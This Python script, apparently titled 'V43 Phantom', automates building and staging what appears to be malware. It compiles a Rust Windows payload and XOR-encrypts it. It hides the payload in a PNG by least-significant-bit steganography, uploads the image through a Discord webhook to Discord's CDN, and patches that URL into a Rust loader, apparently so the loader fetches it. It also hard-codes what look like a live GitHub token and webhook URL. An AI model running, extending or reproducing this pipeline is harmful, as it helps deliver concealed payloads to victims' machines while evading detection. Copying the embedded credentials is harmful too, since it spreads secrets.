﻿#!/usr/bin/env python3
"""
=============================================================================
V43 PHANTOM - AUTOMATED BUILD SYSTEM (FIXED)
=============================================================================
"""

import os
import sys
import subprocess
import hashlib
import json
from pathlib import Path
from datetime import datetime
from PIL import Image
import requests

class Config:
    WORKSPACE = Path("./phantom_workspace")
    PAYLOAD_SRC = WORKSPACE / "payload"
    LOADER_SRC = WORKSPACE / "loader"
    OUTPUT = WORKSPACE / "output"
    
    ENCRYPTION_DOMAIN = "bar.mazaya.workers.dev"
    GITHUB_TOKEN = "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"
    DISCORD_WEBHOOK = "https://discord.com/api/webhooks/1453525039730262060/dBglBZdTrFk8q7jopJJZ7QqV2KvTr4jgST_Yx3SEWD3X26jxCCt8jYB4I-TnPB0EuXka"
    
    RUST_TARGET = "x86_64-pc-windows-msvc"
    OPTIMIZE = True
    STRIP_SYMBOLS = False  # Changed: Don't strip on Windows (causes issues)

def print_banner():
    banner = """
    ╔═══════════════════════════════════════════════════════════════╗
    ║                    V43 PHANTOM BUILD SYSTEM                  ║
    ╚═══════════════════════════════════════════════════════════════╝
    """
    print(banner)

def log(message, level="INFO"):
    timestamp = datetime.now().strftime("%H:%M:%S")
    colors = {"INFO": "\033[94m", "SUCCESS": "\033[92m", "WARNING": "\033[93m", "ERROR": "\033[91m", "RESET": "\033[0m"}
    color = colors.get(level, colors["INFO"])
    print(f"{color}[{timestamp}] [{level}] {message}{colors['RESET']}")

def create_workspace():
    dirs = [Config.WORKSPACE, Config.PAYLOAD_SRC, Config.LOADER_SRC, Config.OUTPUT,
            Config.OUTPUT / "payloads", Config.OUTPUT / "loaders", Config.OUTPUT / "pngs"]
    for d in dirs:
        d.mkdir(parents=True, exist_ok=True)
    log("Workspace created", "SUCCESS")

def compile_rust_payload():
    """FIXED: Save original directory and restore after build"""
    log("Compiling main payload...")
    
    original_dir = os.getcwd()  # FIXED: Save current directory
    
    try:
        os.chdir(Config.PAYLOAD_SRC)
        
        cmd = ["cargo", "build", "--release"]  # FIXED: Removed --target for native compilation
        
        if Config.OPTIMIZE:
            os.environ["RUSTFLAGS"] = "-C opt-level=z -C lto=fat -C codegen-units=1"
        
        result = subprocess.run(cmd, capture_output=True, text=True, check=True)
        log("Payload compiled successfully", "SUCCESS")
        
        # FIXED: Correct path for native build
        payload_path = Config.PAYLOAD_SRC / "target" / "release" / "phantom_payload.exe"
        
        if not payload_path.exists():
            log(f"ERROR: Payload not found at {payload_path}", "ERROR")
            log("Checking target directory...", "INFO")
            target_dir = Config.PAYLOAD_SRC / "target" / "release"
            if target_dir.exists():
                files = list(target_dir.glob("*.exe"))
                log(f"Found files: {files}", "INFO")
        
        return payload_path
    
    except subprocess.CalledProcessError as e:
        log(f"Compilation failed: {e.stderr}", "ERROR")
        sys.exit(1)
    finally:
        os.chdir(original_dir)  # FIXED: Always restore directory

def compile_rust_loader():
    """FIXED: Save and restore directory"""
    log("Compiling loader...")
    
    original_dir = os.getcwd()
    
    try:
        os.chdir(Config.LOADER_SRC)
        
        cmd = ["cargo", "build", "--release"]
        
        result = subprocess.run(cmd, capture_output=True, text=True, check=True)
        log("Loader compiled successfully", "SUCCESS")
        
        loader_path = Config.LOADER_SRC / "target" / "release" / "phantom_loader.exe"
        
        return loader_path
    
    except subprocess.CalledProcessError as e:
        log(f"Loader compilation failed: {e.stderr}", "ERROR")
        sys.exit(1)
    finally:
        os.chdir(original_dir)

def encrypt_payload(payload_data: bytes, key: str) -> bytes:
    log(f"Encrypting payload with key: {key}")
    key_bytes = key.encode('utf-8')
    encrypted = bytearray()
    for i, byte in enumerate(payload_data):
        encrypted.append(byte ^ key_bytes[i % len(key_bytes)])
    log("Payload encrypted", "SUCCESS")
    return bytes(encrypted)

def create_carrier_png(width=1920, height=1080):
    log("Generating carrier PNG...")
    img = Image.new('RGB', (width, height))
    pixels = img.load()
    
    for y in range(height):
        for x in range(width):
            r = int((x / width) * 100)
            g = int((y / height) * 50)
            b = int(150 + (x / width) * 105)
            pixels[x, y] = (r, g, b)
    
    carrier_path = Config.OUTPUT / "pngs" / "carrier.png"
    img.save(carrier_path, 'PNG')
    log(f"Carrier PNG created", "SUCCESS")
    return carrier_path

def embed_lsb(carrier_path: Path, payload_data: bytes) -> Path:
    log("Embedding payload in PNG...")
    img = Image.open(carrier_path).convert('RGB')
    pixels = img.load()
    width, height = img.size
    
    payload_bits = ''.join(format(byte, '08b') for byte in payload_data)
    
    if len(payload_bits) > width * height * 3:
        log("Payload too large for carrier image", "ERROR")
        sys.exit(1)
    
    bit_index = 0
    for y in range(height):
        for x in range(width):
            if bit_index >= len(payload_bits):
                break
            r, g, b = pixels[x, y]
            if bit_index < len(payload_bits):
                r = (r & 0xFE) | int(payload_bits[bit_index])
                bit_index += 1
            if bit_index < len(payload_bits):
                g = (g & 0xFE) | int(payload_bits[bit_index])
                bit_index += 1
            if bit_index < len(payload_bits):
                b = (b & 0xFE) | int(payload_bits[bit_index])
                bit_index += 1
            pixels[x, y] = (r, g, b)
        if bit_index >= len(payload_bits):
            break
    
    output_path = Config.OUTPUT / "pngs" / f"payload_{datetime.now().strftime('%Y%m%d_%H%M%S')}.png"
    img.save(output_path, 'PNG', optimize=True)
    log(f"Payload embedded ({len(payload_data)} bytes)", "SUCCESS")
    return output_path

def upload_to_discord_cdn(png_path: Path) -> str:
    log("Uploading PNG to Discord CDN...")
    webhook_url = Config.DISCORD_WEBHOOK
    
    with open(png_path, 'rb') as f:
        files = {'file': (png_path.name, f, 'image/png')}
        data = {'content': 'Deployment Asset'}
        
        try:
            response = requests.post(webhook_url, files=files, data=data)
            if response.status_code == 200:
                response_data = response.json()
                cdn_url = response_data['attachments'][0]['url']
                log(f"PNG uploaded to CDN", "SUCCESS")
                return cdn_url
            else:
                log(f"CDN upload failed: {response.status_code}", "ERROR")
                return None
        except Exception as e:
            log(f"CDN upload error: {e}", "ERROR")
            return None

def generate_loader_with_cdn_url(cdn_url: str):
    log("Updating loader with CDN URL...")
    loader_template = Config.LOADER_SRC / "src" / "main.rs"
    
    with open(loader_template, 'r', encoding='utf-8') as f:
        loader_code = f.read()
    
    loader_code = loader_code.replace(
        'xor_str!("https://cdn.discordapp.com/attachments/CHANNEL/MSG/payload.png")',
        f'xor_str!("{cdn_url}")'
    )
    
    with open(loader_template, 'w', encoding='utf-8') as f:
        f.write(loader_code)
    
    log("Loader template updated", "SUCCESS")

def generate_build_report(payload_path, loader_path, png_path, cdn_url):
    def get_file_hash(path):
        sha256 = hashlib.sha256()
        with open(path, 'rb') as f:
            sha256.update(f.read())
        return sha256.hexdigest()
    
    report = {
        "build_timestamp": datetime.now().isoformat(),
        "encryption_key": Config.ENCRYPTION_DOMAIN,
        "payload": {"path": str(payload_path), "size": os.path.getsize(payload_path), "sha256": get_file_hash(payload_path)},
        "loader": {"path": str(loader_path), "size": os.path.getsize(loader_path), "sha256": get_file_hash(loader_path)},
        "png": {"path": str(png_path), "size": os.path.getsize(png_path), "cdn_url": cdn_url, "sha256": get_file_hash(png_path)},
    }
    
    report_path = Config.OUTPUT / f"build_report_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
    with open(report_path, 'w') as f:
        json.dump(report, f, indent=4)
    
    log(f"Build report saved", "SUCCESS")
    print("\n" + "="*70)
    print("BUILD SUMMARY")
    print("="*70)
    print(f"Payload Size:     {report['payload']['size']:,} bytes")
    print(f"Loader Size:      {report['loader']['size']:,} bytes")
    print(f"PNG Size:         {report['png']['size']:,} bytes")
    print(f"CDN URL:          {cdn_url}")
    print("="*70 + "\n")

def main():
    print_banner()
    log("Starting V43 Phantom build pipeline...", "INFO")
    
    create_workspace()
    
    log("="*70)
    log("STEP 1: Compiling Main Payload", "INFO")
    payload_path = compile_rust_payload()
    
    log("\n" + "="*70)
    log("STEP 2: Encrypting Payload", "INFO")
    with open(payload_path, 'rb') as f:
        payload_data = f.read()
    encrypted_payload = encrypt_payload(payload_data, Config.ENCRYPTION_DOMAIN)
    
    log("\n" + "="*70)
    log("STEP 3: Embedding in PNG", "INFO")
    carrier_png = create_carrier_png()
    final_png = embed_lsb(carrier_png, encrypted_payload)
    
    log("\n" + "="*70)
    log("STEP 4: Uploading to CDN", "INFO")
    cdn_url = upload_to_discord_cdn(final_png)
    if not cdn_url:
        log("Using local PNG path", "WARNING")
        cdn_url = str(final_png)
    
    log("\n" + "="*70)
    log("STEP 5: Generating Loader", "INFO")
    generate_loader_with_cdn_url(cdn_url)
    loader_path = compile_rust_loader()
    
    log("\n" + "="*70)
    log("STEP 6: Build Report", "INFO")
    generate_build_report(payload_path, loader_path, final_png, cdn_url)
    
    print("\n" + "="*70)
    log("BUILD COMPLETE!", "SUCCESS")
    print("="*70)
    log(f"Loader: {loader_path}", "SUCCESS")
    log(f"PNG: {final_png}", "SUCCESS")
    log(f"CDN: {cdn_url}", "SUCCESS")
    print("="*70 + "\n")

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        log("\nBuild interrupted", "WARNING")
        sys.exit(1)
    except Exception as e:
        log(f"Build failed: {e}", "ERROR")
        import traceback
        traceback.print_exc()
        sys.exit(1)
